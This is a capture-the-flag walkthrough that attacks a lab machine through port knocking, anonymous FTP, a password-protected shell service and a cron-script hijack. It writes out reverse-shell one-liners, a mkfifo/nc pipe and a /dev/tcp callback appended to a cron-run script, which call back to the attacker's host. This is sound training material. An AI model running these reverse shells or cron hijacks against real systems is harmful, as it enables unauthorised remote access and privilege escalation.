NMAP
Let’s start with an Nmap scan to identify the list of services running on the system.
nmap -sV -p- -vv 10.10.147.150PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
4420/tcp open nvm-express? syn-ack
8080/tcp open http syn-ack Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
Web server
There is a web server available on port 8080 where we will find a forum page powered by phbb. I have checked the known exploits and vulnerabilities for phbb, but none of them seemed to work for this one.
Port knocking
As we can see there is a keyword “Knock”, and we have the sequence 1111,2222,3333,4444. You can learn more about port knocking here. But here is an overview.
Port Knocking is a technique that is used to improve the security of a webserver. It works with the help of the firewall. This method helps to identify which users are legitimate so that blocking is effective. For example, if you want to setup port knocking for port 21, this port will only be open when you request to the port 1111, 2222, 3333, 4444 in sequence.
./knock 10.10.147.150 1111 2222 3333 4444I recommend knocking for few times as sometimes it does not work.
FTP
After knocking, we can run the Nmap command again to see whether we get a new open port.
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
4420/tcp open nvm-express
8080/tcp open http-proxyLet’s see if we can access FTP using anonymous credentials.
There is a txt file called note.txt. We can download and read that.
cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.Connect to port 4420, the password is sa*********.
- ca*****r
Initial access — Port 4420
Wow, we got the credentials for port 4420.
nc 10.10.147.150 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sa*********
Password acceptedWe have a shell but it is very limited but, have to get a better shell, right?
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $myip 4442 >/tmp/fnc -lvnp 4442 (listening)
There is a binary located in the home directory of our user. When we run it, it requires us to give a password.
You can reverse engineer that binary and find the password. The easiest option was to simply output the binary using ‘cat’.
cat /home/ca*****/runmeUser flag
Entering the correct password gives us an SSH key.
chmod 600 id_rsa
ssh ca*****@10.10.147.150 -i id_rsaWe get our first flag /root/flag.txt (PS. This root directory is not the real root directory as we are in the docker container)
Root flag
Now, we are root on the docker container. Without running any automated tools, I first checked the bash_history.
A file called /opt/clean/clean.sh might be a key. Let’s find out the content of that.
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bashrm -rf /tmp/*
Well, it looks like a cronjob as it cleans the /tmp directory. We have to find out. Let’s include a reverse shell to /opt/clean/clean.sh to check that out.
echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/$myip/8888 0>&1'" >> clean.shGreat! After a little bit of waiting, we got a root shell.
